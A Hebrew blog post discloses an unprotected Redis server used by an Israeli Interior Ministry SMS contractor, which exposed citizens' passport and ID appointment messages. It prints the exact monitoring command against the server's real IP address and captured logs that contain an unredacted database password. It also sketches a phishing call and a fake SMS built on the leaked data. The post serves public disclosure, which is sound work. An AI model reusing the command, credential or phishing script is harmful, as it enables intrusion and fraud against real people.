רשלנות משמעותית במשרד הפנים חושפת את פרטי האזרחים המוציאים תיעוד ביומטרי

רשלנות מהממת של משרד הפנים חושפת שוב פרטים לציבור. הפעם של כאלו שמבקשים תיעוד ביומטרי

כשהשר אריה דרעי הצליח ליישם את חוק המאגר הביומטרי, לא מעט ארגונים, אנשים וחוקרים התריעו שיש סיכוי גבוה שהוא ייפרץ ותוכנו ייגנב. גם השערוריות והפרת החוק שהיו סביב התיעוד הביומטרי לא הוסיפו לתחושת הבטחון. תגלית חדשה חושפת שכל אחד, ללא ידע טכני משמעותי, יכול לשלוף בקלות רבה פרטים רגישים על כל מי שמוציא תיעוד ביומטרי (דרכון חדש וחידוש דרכון, תעודת זהות).

כאשר המאגר הביומטרי נכנס לתוקף, כל אזרח נדרש להזמין תור במשרד הפנים לשם הוצאת תעודה ביומטרית. בעבר, לפני עידן הביומטרי, הייתי צריך להגיע למשרד הפנים כדי להוציא תעודת זהות או דרכון חדש. היום אני חייב לגשת לרשת ולבקש תור. המערכת מציגה לי את השעות והימים הזמינים ואני בוחר. מייד אחרי הבחירה אני מקבל סמס שבו יש את הפרטים שלי.

סמס ממשרד הפנים לזימון תור
סמס ממשרד הפנים לזימון תור

נראה יעיל, נוח ונעים, נכון? עוד תוצאה מבורכת של המאגר הביומטרי ׳המאובטח׳? הבעיה היא שאבטחת המידע הלקויה של המאגר הביומטרי לא פוסחת גם על שירות הסמסים ולכל אחד יש גישה לסמסים שנשלחים לכלל האזרחים. וכשאני אומר כל אחד, אני מתכוון לכל אחד. הסמסים נשלחים באמצעות משרד הפנים דרך שרת לא מאובטח כלל. כמה לא מאובטח? ברמה שכל ילד בן 17 יכול לגשת אליו וזה בדיוק מה שקרה. באמצעות הקלדת שורה אחת בקונסולה ניתן לגשת מיידית ובזמן אמת לסמסים שנשלחו כולל מספרי הטלפון. כך כל אחד יכול לדעת מתי כל אדם בישראל מבקש תיעוד ביומטרי ומתי נקבע לו תור ומספר הטלפון שלו.

שוב, כל אחד יכול לדעת בזמן אמת מתי אדם בישראל מקבל זימון לתיעוד ביומטרי.

למה זה כל כך חמור?

משתי סיבות עיקריות – סיבה ראשונה: זה מראה את רמת האבטחה שיש במשרד הפנים בכלל ובמאגר הביומטרי בפרט. אחד הדברים הבסיסיים שכל מתכנת סביר יודע הוא לאבטח ולו ברמת הסיסמה כל שרת שפתוח לרשת ובמיוחד שרת שמעביר פרטים כאלו. אם בזה הם כושלים, בהגנה מפני מתקפות שילד בן 11 יכול לבצע, מה קורה כשצריך ליישם אבטחה משמעותית יותר?
שנית, אפשר להשתמש בפרטים האלו לניסיונות פישינג וסחיטה. למשל, דמיינו את תסריט השיחה הבא:

– הלו?
– שלום, מדבר מושיקו ממשרד הפנים. אני רואה שזומן לך תור ללשכה של בני ברק בשעה שמונה וחצי בבוקר ביום שלישי ה-11,01?
– אכן כן! למה התקשרתם?
– אנחנו יכולים לחסוך לך את ההגעה, אנא מסור לי את מספר תעודת הזהות שלך ומספר כרטיס האשראי ונדאג שהדרכון ישלח אליך בדואר.

או למשל שליחת סמס נוסף למספר עם הוראות לכניסה לאתר:

סמס בדיוני שניתן לשלוח כדי לשאוב מידע וכרטיסי אשראי מלקוחות
סמס בדיוני שניתן לשלוח כדי לשאוב מידע וכרטיסי אשראי מלקוחות

או למשל, ניתן להשתמש בפרטים כאלו לשם הפעלת טרור של ממש. למשל לאסוף את המספרים ולתאם מחדש פגישות במשרד הפנים לכולם באותו תאריך, לשלוח צלם שיצלם את הבלגן שיהיה במשרדים והנה – פיגוע תודעה מושלם נגד הישות הציונית.

יש סיכוי סביר שהמידע כבר נאסף ברגעים אלו ממש. קל לעלות על הפרצה הזו ואין לנו שום דרך לדעת מי אוסף את המידע הזה.

שימו לב:

זה לא כלי פריצה, זה הקומנד ליין, הוא נמצא בכל מחשב.

כל מה שצריך זה דמיון. ברגע שפרטים רגישים כאלו נחשפים, הכל אפשרי. כל חברה מסחרית מאבטחת את שירות המשלוחים שלה. למה משרד הפנים, המחזיק במאגר הרגיש במדינה, לא יכול להפעיל פרקטיקות בסיסיות ביותר של אבטחת מידע. זה מביש, זה מטריד ורק מראה על הבאות. לא מעטים שואלים אותי מדוע זה כל כך גרוע שהמדינה תחזיק בידע כל כך רגיש כמו מידע ביומטרי. הנה, זו הדוגמה הטובה ביותר האפשרית: למדינת ישראל כיום אין יכולת מינימלית להגן על עצמה ובפרט שמדובר במשרד הפנים. מדובר בפירצה שכל ילד יכול לנצל.

מידע טכני על הפירצה

מדובר בשרת רדיס שנמצא בכתובת 82.166.96.26 שפתוח לרשת ללא הגנה כלל. כל מה שצריך זה שימוש ב-CLI של רדיס וזה הכל.

redis-cli -h 82.166.96.26 monitor

מקבלים קצת ג׳אנק, אז צריך להשתמש ב-grep עם סקריפט קצר כדי לפלטר ולקבל את האובייקטים הרגילים שמתקבלים בזמן אמת (מספרי הטלפון צונזרו) :

1514705396.611455 [0 127.0.0.1:35767] "set" "sms_dlr_6342977591" "{\"c_time\":1514705396,\"account_id\":351,\"cli\":\"PibaGovIL\",\"dst\":\"05XXXXX\",\"msg\":\"\\u05ea\\u05d9\\u05d0\\u05d5\\u05dd \\u05e4\\u05d2\\u05d9\\u05e9\\u05d4:\\u05ea\\u05d5\\u05d0\\u05de\\u05d4 \\u05e4\\u05d2\\u05d9\\u05e9\\u05ea\\u05da\\n\\u05dc\\u05dc\\u05e9\\u05db\\u05ea \\u05e8\\u05de\\u05dc\\u05d4 \\u05d1- 10:45 22\\/01\\/2018 \\u05dc\\u05e7\\u05d1\\u05dc\\u05ea \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd \\u05e0\\u05d5\\u05e1\\u05e4\\u05d9\\u05dd \\u05d9\\u05e9 \\u05dc\\u05d4\\u05d9\\u05db\\u05e0\\u05e1 \\u05dc\\u05d0\\u05ea\\u05e8 \\u05e8\\u05e9\\u05d5\\u05ea \\u05d4\\u05d0\\u05d5\\u05db\\u05dc\\u05d5\\u05e1\\u05d9\\u05df \\u05d5\\u05d4\\u05d4\\u05d2\\u05d9\\u05e8\\u05d4 www.piba.gov.il\\r\\n\\u05e9\\u05d9\\u05dd \\u05dc\\u05d1! \\u05d1\\u05db\\u05dc \\u05e4\\u05e0\\u05d9\\u05d9\\u05d4 \\u05d9\\u05d9\\u05e0\\u05ea\\u05df \\u05e9\\u05d9\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05d5\\u05e0\\u05d4\\/\\u05d0\\u05d3\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d1\\u05dc\\u05d1\\u05d3.\\r\\n\\u05dc\\u05ea\\u05e9\\u05dc\\u05d5\\u05dd \\u05de\\u05d5\\u05d6\\u05dc \\u05dc\\u05d3\\u05e8\\u05db\\u05d5\\u05df\\/\\u05ea. \\u05de\\u05e2\\u05d1\\u05e8, \\u05dc\\u05d7\\u05e5: http:\\/\\/bit.ly\\/passpay\",\"status\":\"SUCCESS\",\"unique_batch_id\":\"1514705395\",\"sms_count\":\"2\",\"sms_count_cost\":\"4\",\"operator\":\"Bezeq\",\"database\":\"sms2\",\"database_user\":\"sms2\",\"database_pass\":\"Sm5@5mSMASqyou\",\"msg_id\":\"87493703\",\"transactionid\":\"6342977591\"}"
1514705399.005506 [0 10.55.224.8:51530] "rpush" "sms_q_351_1514705398" "{\"c_time\":1514705398,\"account_id\":351,\"cli\":\"PibaGovIL\",\"dst\":\"050XXXXXX\",\"msg\":\"\\u05ea\\u05d9\\u05d0\\u05d5\\u05dd \\u05e4\\u05d2\\u05d9\\u05e9\\u05d4:\\u05ea\\u05d5\\u05d0\\u05de\\u05d4 \\u05e4\\u05d2\\u05d9\\u05e9\\u05ea\\u05da\\n\\u05dc\\u05dc\\u05e9\\u05db\\u05ea \\u05e8\\u05d7\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1- 09:00 13\\/02\\/2018 \\u05dc\\u05e7\\u05d1\\u05dc\\u05ea \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd \\u05e0\\u05d5\\u05e1\\u05e4\\u05d9\\u05dd \\u05d9\\u05e9 \\u05dc\\u05d4\\u05d9\\u05db\\u05e0\\u05e1 \\u05dc\\u05d0\\u05ea\\u05e8 \\u05e8\\u05e9\\u05d5\\u05ea \\u05d4\\u05d0\\u05d5\\u05db\\u05dc\\u05d5\\u05e1\\u05d9\\u05df \\u05d5\\u05d4\\u05d4\\u05d2\\u05d9\\u05e8\\u05d4 www.piba.gov.il\\r\\n\\u05e9\\u05d9\\u05dd \\u05dc\\u05d1! \\u05d1\\u05db\\u05dc \\u05e4\\u05e0\\u05d9\\u05d9\\u05d4 \\u05d9\\u05d9\\u05e0\\u05ea\\u05df \\u05e9\\u05d9\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05d5\\u05e0\\u05d4\\/\\u05d0\\u05d3\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d1\\u05dc\\u05d1\\u05d3.\\r\\n\\u05dc\\u05ea\\u05e9\\u05dc\\u05d5\\u05dd \\u05de\\u05d5\\u05d6\\u05dc \\u05dc\\u05d3\\u05e8\\u05db\\u05d5\\u05df\\/\\u05ea. \\u05de\\u05e2\\u05d1\\u05e8, \\u05dc\\u05d7\\u05e5: http:\\/\\/bit.ly\\/passpay\",\"status\":\"Redis\",\"unique_batch_id\":\"1514705398\",\"sms_count\":\"2\",\"sms_count_cost\":\"4\",\"operator\":\"General\",\"database\":\"sms2\",\"database_user\":\"sms2\",\"database_pass\":\"Sm5@5mSMASqyou\",\"msg_id\":\"87493706\"}"
1514705399.595977 [0 127.0.0.1:35902] "set" "sms_dlr_6342978961" "{\"c_time\":1514705399,\"account_id\":351,\"cli\":\"PibaGovIL\",\"dst\":\"0505XXXXX\",\"msg\":\"\\u05ea\\u05d9\\u05d0\\u05d5\\u05dd \\u05e4\\u05d2\\u05d9\\u05e9\\u05d4:\\u05ea\\u05d5\\u05d0\\u05de\\u05d4 \\u05e4\\u05d2\\u05d9\\u05e9\\u05ea\\u05da\\n\\u05dc\\u05dc\\u05e9\\u05db\\u05ea \\u05e8\\u05d7\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1- 09:00 13\\/02\\/2018 \\u05dc\\u05e7\\u05d1\\u05dc\\u05ea \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd \\u05e0\\u05d5\\u05e1\\u05e4\\u05d9\\u05dd \\u05d9\\u05e9 \\u05dc\\u05d4\\u05d9\\u05db\\u05e0\\u05e1 \\u05dc\\u05d0\\u05ea\\u05e8 \\u05e8\\u05e9\\u05d5\\u05ea \\u05d4\\u05d0\\u05d5\\u05db\\u05dc\\u05d5\\u05e1\\u05d9\\u05df \\u05d5\\u05d4\\u05d4\\u05d2\\u05d9\\u05e8\\u05d4 www.piba.gov.il\\r\\n\\u05e9\\u05d9\\u05dd \\u05dc\\u05d1! \\u05d1\\u05db\\u05dc \\u05e4\\u05e0\\u05d9\\u05d9\\u05d4 \\u05d9\\u05d9\\u05e0\\u05ea\\u05df \\u05e9\\u05d9\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05d5\\u05e0\\u05d4\\/\\u05d0\\u05d3\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d1\\u05dc\\u05d1\\u05d3.\\r\\n\\u05dc\\u05ea\\u05e9\\u05dc\\u05d5\\u05dd \\u05de\\u05d5\\u05d6\\u05dc \\u05dc\\u05d3\\u05e8\\u05db\\u05d5\\u05df\\/\\u05ea. \\u05de\\u05e2\\u05d1\\u05e8, \\u05dc\\u05d7\\u05e5: http:\\/\\/bit.ly\\/passpay\",\"status\":\"SUCCESS\",\"unique_batch_id\":\"1514705398\",\"sms_count\":\"2\",\"sms_count_cost\":\"4\",\"operator\":\"Bezeq\",\"database\":\"sms2\",\"database_user\":\"sms2\",\"database_pass\":\"Sm5@5mSMASqyou\",\"msg_id\":\"87493706\",\"transactionid\":\"6342978961\"}"
1514705402.058186 [0 10.55.224.8:51576] "rpush" "sms_q_351_1514705402" "{\"c_time\":1514705402,\"account_id\":351,\"cli\":\"PibaGovIL\",\"dst\":\"050XXXXX\",\"msg\":\"\\u05d4\\u05e0\\u05d7\\u05d9\\u05d5\\u05ea \\u05dc\\u05e7\\u05d1\\u05dc\\u05ea \\u05e9\\u05d9\\u05e8\\u05d5\\u05ea:\\n\\u05d3\\u05e8\\u05db\\u05d5\\u05df \\u05d1\\u05d9\\u05d5\\u05de\\u05d8\\u05e8\\u05d9- \\u05e8\\u05d0\\u05e9\\u05d5\\u05df\\r\\n\\u05d1\\u05d4\\u05d2\\u05d9\\u05e2\\u05da \\u05dc\\u05dc\\u05e9\\u05db\\u05d4 \\u05dc\\u05e7\\u05d1\\u05dc\\u05ea \\u05d4\\u05e9\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e9 \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0:\\r\\n1.\\u05ea\\u05e2\\u05d5\\u05d3\\u05ea \\u05d6\\u05d4\\u05d5\\u05ea, \\u05d7\\u05d5\\u05d1\\u05d4.\\r\\n2.\\u05d3\\u05e8\\u05db\\u05d5\\u05df \\u05e7\\u05d5\\u05d3\\u05dd (\\u05d0\\u05dd \\u05d9\\u05e9\\u05e0\\u05d5), \\u05d7\\u05d5\\u05d1\\u05d4.\\r\\n3.\\u05e7\\u05d8\\u05d9\\u05df  (\\u05e2\\u05d3 \\u05d2\\u05d9\\u05dc 18) \\u05d7\\u05d9\\u05d9\\u05d1 \\u05d1\\u05e0\\u05d5\\u05db\\u05d7\\u05d5\\u05ea \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd \\u05d1\\u05dc\\u05e9\\u05db\\u05d4 \\u05d5\\u05d4\\u05e6\\u05d2\\u05ea \\u05ea\\u05e2\\u05d5\\u05d3\\u05d5\\u05ea \\u05d4\\u05d6\\u05d4\\u05d5\\u05ea \\u05e9\\u05dc\\u05d4\\u05dd.\\r\\n(\\u05dc\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd \\u05e0\\u05e9\\u05d5\\u05d0\\u05d9\\u05dd \\u05de\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d4\\u05d5\\u05e8\\u05d4 \\u05d0\\u05d7\\u05d3) \\r\\n4.\\u05ea\\u05e9\\u05dc\\u05d5\\u05dd \\u05d0\\u05d2\\u05e8\\u05d4, \\u05dc\\u05ea\\u05e9\\u05dc\\u05d5\\u05dd \\u05de\\u05d5\\u05d6\\u05dc \\u05dc\\u05d3\\u05e8\\u05db\\u05d5\\u05df\\/\\u05ea\\u05e2\\u05d5\\u05d3\\u05ea \\u05de\\u05e2\\u05d1\\u05e8, \\u05dc\\u05d7\\u05e5: http:\\/\\/bit.ly\\/passpay\",\"status\":\"Redis\",\"unique_batch_id\":\"1514705402\",\"sms_count\":\"2\",\"sms_count_cost\":\"5\",\"operator\":\"General\",\"database\":\"sms2\",\"database_user\":\"sms2\",\"database_pass\":\"Sm5@5mSMASqyou\",\"msg_id\":\"87493709\"}"
1514705402.409825 [0 127.0.0.1:35917] "set" "sms_dlr_6342979848" "{\"c_time\":1514705402,\"account_id\":351,\"cli\":\"PibaGovIL\",\"dst\":\"050XXXX\",\"msg\":\"\\u05d4\\u05e0\\u05d7\\u05d9\\u05d5\\u05ea \\u05dc\\u05e7\\u05d1\\u05dc\\u05ea \\u05e9\\u05d9\\u05e8\\u05d5\\u05ea:\\n\\u05d3\\u05e8\\u05db\\u05d5\\u05df \\u05d1\\u05d9\\u05d5\\u05de\\u05d8\\u05e8\\u05d9- \\u05e8\\u05d0\\u05e9\\u05d5\\u05df\\r\\n\\u05d1\\u05d4\\u05d2\\u05d9\\u05e2\\u05da \\u05dc\\u05dc\\u05e9\\u05db\\u05d4 \\u05dc\\u05e7\\u05d1\\u05dc\\u05ea \\u05d4\\u05e9\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e9 \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0:\\r\\n1.\\u05ea\\u05e2\\u05d5\\u05d3\\u05ea \\u05d6\\u05d4\\u05d5\\u05ea, \\u05d7\\u05d5\\u05d1\\u05d4.\\r\\n2.\\u05d3\\u05e8\\u05db\\u05d5\\u05df \\u05e7\\u05d5\\u05d3\\u05dd (\\u05d0\\u05dd \\u05d9\\u05e9\\u05e0\\u05d5), \\u05d7\\u05d5\\u05d1\\u05d4.\\r\\n3.\\u05e7\\u05d8\\u05d9\\u05df  (\\u05e2\\u05d3 \\u05d2\\u05d9\\u05dc 18) \\u05d7\\u05d9\\u05d9\\u05d1 \\u05d1\\u05e0\\u05d5\\u05db\\u05d7\\u05d5\\u05ea \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd \\u05d1\\u05dc\\u05e9\\u05db\\u05d4 \\u05d5\\u05d4\\u05e6\\u05d2\\u05ea \\u05ea\\u05e2\\u05d5\\u05d3\\u05d5\\u05ea \\u05d4\\u05d6\\u05d4\\u05d5\\u05ea \\u05e9\\u05dc\\u05d4\\u05dd.\\r\\n(\\u05dc\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd \\u05e0\\u05e9\\u05d5\\u05d0\\u05d9\\u05dd \\u05de\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d4\\u05d5\\u05e8\\u05d4 \\u05d0\\u05d7\\u05d3) \\r\\n4.\\u05ea\\u05e9\\u05dc\\u05d5\\u05dd \\u05d0\\u05d2\\u05e8\\u05d4, \\u05dc\\u05ea\\u05e9\\u05dc\\u05d5\\u05dd \\u05de\\u05d5\\u05d6\\u05dc \\u05dc\\u05d3\\u05e8\\u05db\\u05d5\\u05df\\/\\u05ea\\u05e2\\u05d5\\u05d3\\u05ea \\u05de\\u05e2\\u05d1\\u05e8, \\u05dc\\u05d7\\u05e5: http:\\/\\/bit.ly\\/passpay\",\"status\":\"SUCCESS\",\"unique_batch_id\":\"1514705402\",\"sms_count\":\"2\",\"sms_count_cost\":\"5\",\"operator\":\"Bezeq\",\"database\":\"sms2\",\"database_user\":\"sms2\",\"database_pass\":\"Sm5@5mSMASqyou\",\"msg_id\":\"87493709\",\"transactionid\":\"6342979848\"}"

כל מה שצריך זה רק להאזין. הכל פתוח. הפרקטיקה המקובלת היא לא לאפשר גישה מכל מקום אל שרת הרדיס. משתמשים ברדיס בהמון מקומות, גם בעבודה שלי וגם בפרויקטים שיצא לי לעבוד בהם/לייעץ בהם. מעולם לא ראיתי שרת שפתוח לרשת בצורה כזו. זה כל כך רשלני וחורג מפרקטיקות מקובלות שבהחלט כדאי לשקול תביעת נזיקין בגין הרשלנות.

ברגע שהודעתי למשרד הפנים הם סגרו את השירות. התגובה שלהם?

הפרטים אליהם הגיע כתבכם הינם פרטים שנשלחו אל קבלן משנה של רשות האוכלוסין לצורך שליחת sms לאזרחים, לדברי ספק השירות התקלה זוהתה לפני מספר ימים והשרת המדובר אינו זמין יותר, רשות האוכלסין מתיחסת בחומרה רבה לאירוע. אנו נמצאים בשלבי תחקור הארוע ובחינת המשך העבודה עם הספק

התגובה שלי לתגובה שלהם? שקצת חצוף להגיד "לדברי ספק השירות התקלה זוהתה לפני מספר ימים" כי זה שקר גס.הם זיהו את זה אחרי שהודעתי להם.

פוסטים נוספים שכדאי לקרוא

רספברי פיי

הרצת גו על רספברי פיי

עולם הרספברי פיי והמייקרים ניתן לתפעול בכל שפה – לא רק פייתון או C – כאן אני מסביר על גו

תמונת תצוגה של מנעול על מחשב
פתרונות ומאמרים על פיתוח אינטרנט

הגנה מפני XSS עם Trusted Types

תכונה ב-CSP שמאפשרת מניעה כמעט הרמטית להתקפות XSS שכל מפתח ווב צריך להכיר וכדאי שיכיר.

גלילה לראש העמוד